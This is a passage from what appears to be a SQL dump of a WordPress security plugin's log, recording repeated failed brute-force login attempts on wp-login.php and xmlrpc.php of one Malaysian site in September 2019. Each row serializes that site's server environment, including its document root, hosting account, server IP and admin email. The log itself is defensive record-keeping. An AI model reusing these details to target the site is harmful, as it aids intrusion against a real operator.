10:09:28',18256432,19556248,'https://bintara.com.my/xmlrpc.php',1,0,'50.63.167.184'),(24059,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"50.63.167.184\";s:11:\"REMOTE_PORT\";s:5:\"55036\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9fVGf5CPZPc3WLyou5AQAAAMc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568628564.8342\";s:12:\"REQUEST_TIME\";s:10:\"1568628564\";}}','notice','2019-09-16 10:09:26','2019-09-16 10:09:25',17905344,19231568,'https://bintara.com.my/wp-login.php',1,0,'50.63.167.184'),(24058,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"50.63.167.184\";s:11:\"REMOTE_PORT\";s:5:\"55036\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9fVGf5CPZPc3WLyou5AQAAAMc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568628564.8342\";s:12:\"REQUEST_TIME\";s:10:\"1568628564\";}}','notice','2019-09-16 10:09:26','2019-09-16 10:09:25',17743200,19231568,'https://bintara.com.my/wp-login.php',1,0,'50.63.167.184'),(24057,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"159.203.56.162\";s:11:\"REMOTE_PORT\";s:5:\"50034\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9euuBXE2JRepjOtvm3YAAAAA4\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568628410.7374\";s:12:\"REQUEST_TIME\";s:10:\"1568628410\";}}','notice','2019-09-16 10:06:52','2019-09-16 10:06:51',18256424,19556208,'https://bintara.com.my/xmlrpc.php',1,0,'159.203.56.162'),(24056,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"159.203.56.162\";s:11:\"REMOTE_PORT\";s:5:\"48690\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9esmf5CPZPc3WLyou4jwAAAMY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568628402.6834\";s:12:\"REQUEST_TIME\";s:10:\"1568628402\";}}','notice','2019-09-16 10:06:43','2019-09-16 10:06:43',17738752,19229904,'https://bintara.com.my/wp-login.php',1,0,'159.203.56.162'),(24055,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"116.203.198.2\";s:11:\"REMOTE_PORT\";s:5:\"47884\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9ceuBXE2JRepjOtvm21QAAAAs\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568627834.7155\";s:12:\"REQUEST_TIME\";s:10:\"1568627834\";}}','notice','2019-09-16 09:57:16','2019-09-16 09:57:15',18256432,19556248,'https://bintara.com.my/xmlrpc.php',1,0,'116.203.198.2'),(24054,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"116.203.198.2\";s:11:\"REMOTE_PORT\";s:5:\"47450\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9cdwavjo3v4tJT4rvxcwAAAI0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568627831.9643\";s:12:\"REQUEST_TIME\";s:10:\"1568627831\";}}','notice','2019-09-16 09:57:13','2019-09-16 09:57:12',17739408,19231368,'https://bintara.com.my/wp-login.php',1,0,'116.203.198.2'),(24053,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"176.53.12.11\";s:11:\"REMOTE_PORT\";s:5:\"49586\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9cZQavjo3v4tJT4rvxZwAAAIE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568627813.6689\";s:12:\"REQUEST_TIME\";s:10:\"1568627813\";}}','notice','2019-09-16 09:56:55','2019-09-16 09:56:54',18255448,19555656,'https://bintara.com.my/xmlrpc.php',1,0,'176.53.12.11'),(24052,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"176.53.12.11\";s:11:\"REMOTE_PORT\";s:5:\"48618\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9cYuBXE2JRepjOtvm20gAAAAY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568627810.3646\";s:12:\"REQUEST_TIME\";s:10:\"1568627810\";}}','notice','2019-09-16 09:56:51','2019-09-16 09:56:50',17738888,19231032,'https://bintara.com.my/wp-login.php',1,0,'176.53.12.11'),(24051,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"139.59.40.233\";s:11:\"REMOTE_PORT\";s:5:\"50379\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9ao71rBLb0GV3O7mTb6gAAAFM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568627363.5863\";s:12:\"REQUEST_TIME\";s:10:\"1568627363\";}}','notice','2019-09-16 09:49:24','2019-09-16 